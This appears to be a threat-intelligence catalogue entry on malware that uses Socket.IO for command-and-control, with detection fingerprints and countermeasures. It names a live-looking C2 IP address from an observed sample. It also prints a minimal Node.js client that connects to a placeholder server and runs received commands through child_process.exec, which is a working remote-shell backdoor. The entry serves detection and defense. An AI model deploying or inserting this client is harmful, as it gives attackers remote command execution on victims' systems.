typetechniquecreated2026-08-21updated2026-08-21c2c2-protocolmitre-attckscript

Socket.IO C2 Transport

Malware uses the Socket.IO library to establish a persistent, bidirectional, event-driven WebSocket-over-HTTP C2 channel. Events are used to issue commands (client-execute-command), transfer files (file-chunk, file-complete), and stream screen captures in real time.

Detection / Fingerprint

  • Hardcoded socket.io-client string in JavaScript source
  • HTTP traffic with Socket.IO handshake (EIO=, transport=polling upgrade to websocket)
  • emit() and on() patterns with event names like join-message, ping-room, pong-room
  • Query parameters carrying attacker/session IDs (e.g., query.attackerId)

Implementation Patterns Observed

In novashadow the client connects to http://144.172.93.158 with attackerId in the query object, then listens for:

  • connect → emits join-message
  • client-execute-command → spawns PowerShell and streams output via command-output
  • start-screen-sharing / stop-screen-sharing → toggles desktop capture

Reproduce on Your Own VMs

  1. Install Node.js and socket.io-client
  2. Build a minimal client:
    const io = require('socket.io-client');
    const socket = io('http://your-server', { query: { attackerId: 'test' }});
    socket.on('client-execute-command', cmd => {
      const { exec } = require('child_process');
      exec(cmd, (e, out) => socket.emit('command-output', { out }));
    });
    
  3. Pair with a Socket.IO server running on your C2 host

Defensive Countermeasures

  • Monitor for socket.io-client in process command lines or loaded modules
  • Alert on WebSocket upgrade traffic to non-standard ports without SNI
  • Hunt for JavaScript files containing both socket.io-client and child_process.exec